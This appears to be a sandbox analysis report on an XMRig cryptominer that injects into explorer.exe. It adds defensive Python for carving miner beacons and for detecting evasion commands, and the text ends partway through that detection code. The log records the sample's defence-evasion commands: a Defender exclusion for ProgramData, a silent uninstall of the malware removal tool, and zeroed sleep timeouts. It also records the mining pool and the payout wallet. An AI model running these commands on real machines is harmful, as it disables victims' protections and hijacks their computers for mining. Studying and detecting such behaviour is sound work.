                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 6196 base: 475010 value: 00
                        Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                        Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
                        Source: C:\Windows\explorer.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Thread register set: target process: 6196
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C4410 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_007C4410
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C44E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,0_2_007C44E0
                        Source: C:\Windows\explorer.exe Code function: 4_2_00BE42E0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,4_2_00BE42E0
                        Source: C:\Windows\explorer.exe Code function: 4_2_00BE43D0 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,CloseHandle,4_2_00BE43D0
                        Source: C:\Windows\explorer.exe Code function: 4_2_00BEA3B0 setsockopt,SetEvent,LocalAlloc,wnsprintfW,LocalAlloc,lstrcpyW,LocalAlloc,lstrcpyW,CoInitializeEx,ShellExecuteExW,GetLastError,CoUninitialize,LocalAlloc,wnsprintfW,CreateProcessW,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,OpenEventW,SetEvent,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,shutdown,closesocket,4_2_00BEA3B0
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007D0400 AllocateAndInitializeSid,_memset,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,LocalFree,0_2_007D0400
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007DC3A0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007DC3A0
                        Source: explorer.exe, 00000020.00000003.2475631783.0000000000748000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ufalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}NN
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\explorer.exe - Program Managermh
                        Source: explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768851377.0000000000765000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                        Source: explorer.exe, 00000020.00000002.4654016391.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443507945.0000000000748000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\explorer.exe - Program Manager
                        Source: explorer.exe, 00000020.00000002.4654016391.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768810420.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390678126.0000000002C40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Managerpool.hashvault.pro46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB
                        Source: explorer.exe, 00000020.00000003.3391079350.0000000000787000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390986880.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":60,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":689.4497400346621,"status":2}
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                        Source: explorer.exe, 00000020.00000003.2475456723.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}NN
                        Source: explorer.exe, 00000020.00000003.3768750703.0000000000785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":120,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":602.4033437826541,"status":2}
                        Source: explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475631783.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475456723.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: falyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                        Source: explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}~P
                        Source: explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768851377.0000000000765000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768750703.0000000000762000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9w
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: a%p {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}~P
                        Source: explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: yv`;tfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":1,"type":"xmrig","status":1}
                        Source: explorer.exe, 00000020.00000003.2443507945.0000000000748000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program ManagerM@
                        Source: explorer.exe, 00000020.00000003.3768750703.0000000000785000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: {"id":"omsihloywfalyrob","computername":"648351","username":"648351","gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":120,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":602.4033437826541,"status":2}t
                        Source: C:\Users\user\Desktop\file.exe  Code function: OpenEventW,OpenMutexW,OpenMutexW,WaitForSingleObject,CreateEventW,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,WaitForSingleObject,WaitForSingleObject,setsockopt,CreateEventW,LocalAlloc,CreateThread,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,___crtGetLocaleInfoEx,WSAGetLastError,GetTickCount,GetTickCount,___crtGetLocaleInfoEx,Sleep,shutdown,closesocket,SetEvent,WaitForSingleObject,CloseHandle,LocalFree,CloseHandle,shutdown,closesocket,CloseHandle,ExitProcess,WaitForSingleObject,WaitForSingleObject,SetEvent,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,ReleaseMutex,CloseHandle,CloseHandle,CloseHandle,0_2_007E1030
                        Source: C:\Users\user\Desktop\file.exe  Code function: setsockopt,___crtGetLocaleInfoEx,closesocket,0_2_007D70F2
                        Source: C:\Users\user\Desktop\file.exe  Code function: setsockopt,___crtGetLocaleInfoEx,closesocket,0_2_007D70D9
                        Source: C:\Users\user\Desktop\file.exe  Code function: ___crtGetLocaleInfoEx,WSACreateEvent,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WaitForSingleObject,WSAEnumNetworkEvents,CloseHandle,0_2_007E0950
                        Source: C:\Users\user\Desktop\file.exe  Code function: LocalAlloc,und_memcpy,CreateEventW,wsprintfW,GetForegroundWindow,SetWindowTextW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,0_2_007DF9E0
                        Source: C:\Users\user\Desktop\file.exe  Code function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,WSAGetLastError,LocalFree,CloseHandle,CloseHandle,LocalFree,0_2_007DFC10
                        Source: C:\Users\user\Desktop\file.exe  Code function: LocalAlloc,htons,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,0_2_007E04F0
                        Source: C:\Users\user\Desktop\file.exe  Code function: ___crtGetLocaleInfoEx,WSACreateEvent,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WSAGetLastError,WSAEventSelect,WSAWaitForMultipleEvents,WaitForSingleObject,WSAEnumNetworkEvents,CloseHandle,0_2_007E0CD0
                        Source: C:\Users\user\Desktop\file.exe  Code function: CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,setsockopt,___crtGetLocaleInfoEx,closesocket,setsockopt,___crtGetLocaleInfoEx,closesocket,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,___crtGetLocaleInfoEx,closesocket,0_2_007D6D30
                        Source: C:\Users\user\Desktop\file.exe  Code function: LocalAlloc,htons,wsprintfA,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,0_2_007E0630
                        Source: C:\Users\user\Desktop\file.exe  Code function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,WSAGetLastError,LocalFree,CloseHandle,CloseHandle,LocalFree,0_2_007DFE10
                        Source: C:\Users\user\Desktop\file.exe  Code function: ___crtGetLocaleInfoEx,0_2_007DF690
                        Source: C:\Users\user\Desktop\file.exe  Code function: ___crtGetLocaleInfoEx,0_2_007DF730
                        Source: C:\Users\user\Desktop\file.exe  Code function: LocalAlloc,und_memcpy,CreateEventW,WSAEventSelect,WSAWaitForMultipleEvents,LocalFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,LocalFree,CloseHandle,CloseHandle,LocalFree,0_2_007DF7D0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_007D41E0 __snwprintf,RegCreateKeyExW,RegCloseKey,_memset,GetSystemTime,SystemTimeToFileTime,0_2_007D41E0
                        Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_007E2530 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,_memset,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,0_2_007E2530
                        Source: C:\Windows\explorer.exe  Code function: 33_2_0145A674 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,33_2_0145A674
                        Source: C:\Users\user\Desktop\file.exe  Code function: 0_2_007DC090 GetModuleHandleA,GetProcAddress,RtlGetVersion,0_2_007DC090
                        Source: C:\Windows\explorer.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
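The "Binary or memory string" entries above are XMRig-style telemetry beacons carved out of the injected explorer.exe process (process 0x20). They carry the miner configuration a responder wants as indicators: pool host and port, algorithm, payout wallet and a per-bot id. Several of the fragments are head-truncated (they begin mid-value, e.g. `ufalyrob","computername":...`), which a naive JSON parse rejects. The Python below is an added example, not code from the sample, from Joe Sandbox or from this report: it carves such beacons out of a strings dump, repairs the truncated ones, and reduces them to pool, wallet and bot-id indicators. `DUMP_STRINGS` is constructed to mirror the fragments listed above; the function names and the `_partial` marker are this example's own, and the wallet check assumes a standard 95-character Monero address beginning with 4.

```python
"""Carve XMRig-style miner telemetry out of memory-dump strings.

Added example for this report, not code from the sample or from Joe Sandbox.
DUMP_STRINGS is constructed to mirror the explorer.exe fragments in the report:
one complete beacon with neighbouring garbage bytes, one fragment whose head was
overwritten (it starts inside the "id" value), and one unrelated string.
"""
import json
import re

DUMP_STRINGS = [  # constructed sample input
    'a%p {"id":"omsihloywfalyrob","computername":"648351","username":"648351",'
    '"gpu":"M669LA8","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"",'
    '"version":"3.4.1","activewindow":"C:\\\\Windows\\\\explorer.exe - Program Manager",'
    '"runtime":60,"type":"xmrig","pool":"pool.hashvault.pro","port":3333,"algo":"rx/0",'
    '"worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB",'
    '"hashrate":689.4497400346621,"status":2}~P',
    'ufalyrob","computername":"648351","username":"648351","gpu":"M669LA8",'
    '"version":"3.4.1","runtime":1,"type":"xmrig","status":1}NN',
    'C:\\Windows\\explorer.exe - Program Manager',
]

# A complete beacon: an object opening with the "id" key and ending at "status":N}.
BEACON_RE = re.compile(r'\{"id":"[^"]*".*?"status":\d+\}')
# A head-truncated beacon: the first key still intact is "computername".
FRAGMENT_RE = re.compile(r'"computername":.*?"status":\d+\}')
# Assumption (see lead-in): a standard Monero address is 95 base58 characters
# starting with 4; integrated addresses and subaddresses look different.
MONERO_ADDR_RE = re.compile(r'4[1-9A-HJ-NP-Za-km-z]{94}')


def carve_beacons(strings):
    """Return one dict per beacon found. Truncated fragments are repaired by
    re-adding the opening brace and are marked with "_partial": True."""
    beacons = []
    for s in strings:
        m = BEACON_RE.search(s)
        if m:
            obj = json.loads(m.group(0))
            obj["_partial"] = False
        else:
            m = FRAGMENT_RE.search(s)
            if not m:
                continue
            obj = json.loads("{" + m.group(0))
            obj["_partial"] = True
        beacons.append(obj)
    return beacons


def mining_iocs(beacons):
    """Reduce beacons to the indicators a responder blocks and hunts on."""
    iocs = {"pools": set(), "wallets": set(), "bot_ids": set(),
            "bad_wallet_format": set(), "max_hashrate": 0.0}
    for b in beacons:
        if b.get("type") != "xmrig":
            continue
        if b.get("pool"):
            iocs["pools"].add(f'{b["pool"]}:{b.get("port", "")}')
        wallet = b.get("user")
        if wallet:
            key = "wallets" if MONERO_ADDR_RE.fullmatch(wallet) else "bad_wallet_format"
            iocs[key].add(wallet)
        if b.get("id"):
            iocs["bot_ids"].add(b["id"])
        iocs["max_hashrate"] = max(iocs["max_hashrate"], float(b.get("hashrate", 0)))
    return iocs


if __name__ == "__main__":
    found = carve_beacons(DUMP_STRINGS)
    for b in found:
        print("partial" if b["_partial"] else "complete", b.get("id", "?"), b.get("pool", "-"))
    print(mining_iocs(found))
```

The partial beacons still matter: they are the `status:1` (pre-connection) heartbeats, so they prove the miner ran even when the pool fields were never written, and the `computername`/`username` values show which host a wallet is tied to. Feed the `pools` set to DNS and egress blocking and the `wallets` set to a hunt across other hosts' dumps.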

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe  Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe  Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: procexp.exe
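The two powercfg invocations above, together with the `Add-MpPreference -ExclusionPath` and `wusa /uninstall /kb:890830` process creations listed earlier in the report, are the defence-evasion steps a detection engineer keys on: zeroing the AC standby and hibernate timeouts keeps the host awake for the miner, the Defender exclusion covers the drop directories under C:\ProgramData, and KB890830 is the Malicious Software Removal Tool. The Python below is an added example, not code from the sample, from Joe Sandbox or from this report. It runs three such rules over `EVENTS`, a constructed stream shaped like Sysmon process-creation records and modelled on the commands in this report; the event shape, the rule names and the benign `powercfg /list` control are this example's assumptions. It goes one step beyond the plaintext cmdlet seen here by decoding a PowerShell `-EncodedCommand` payload before matching, so the base64 form of the same cmdlet is caught too.

```python
"""Process-creation rules for the defence-evasion commands in this report.

Added example, not code from the sample, from Joe Sandbox or from this report.
EVENTS is a constructed stream shaped like Sysmon process-creation records
(pid, parent image, image, command line); the rule names, the event shape and
the benign powercfg /list control are this example's own assumptions.
"""
import base64
import re

# Constructed: the cmdlet the sample ran in the clear, but in the
# -EncodedCommand (base64 of UTF-16LE) form PowerShell loaders commonly use.
ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\ProgramData'".encode("utf-16-le")).decode()

EVENTS = [  # constructed sample input modelled on the report's process tree
    {"pid": 1, "parent_image": r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe",
     "image": r"C:\Windows\System32\powercfg.exe",
     "cmdline": r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"},
    {"pid": 2, "parent_image": r"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe",
     "image": r"C:\Windows\System32\powercfg.exe",
     "cmdline": r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"},
    {"pid": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Add-MpPreference -ExclusionPath "
                r"'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData'"},
    {"pid": 4, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wusa.exe",
     "cmdline": r"wusa /uninstall /kb:890830 /quiet /norestart"},
    {"pid": 5, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"pid": 6, "parent_image": r"C:\Windows\explorer.exe",  # benign control
     "image": r"C:\Windows\System32\powercfg.exe",
     "cmdline": r"powercfg.exe /list"},
]

RULES = {
    # powercfg /x (alias of /change) setting a sleep/hibernate timeout to 0
    # keeps the host awake; the sample did this for the AC profile.
    "power_timeouts_disabled": re.compile(
        r"\bpowercfg(\.exe)?\b.*\s(/x|-x|/change|-change)\s"
        r".*-(standby|hibernate|monitor|disk)-timeout-(ac|dc)\s+0\b", re.I),
    # Any Defender exclusion added from the command line.
    "defender_exclusion_added": re.compile(
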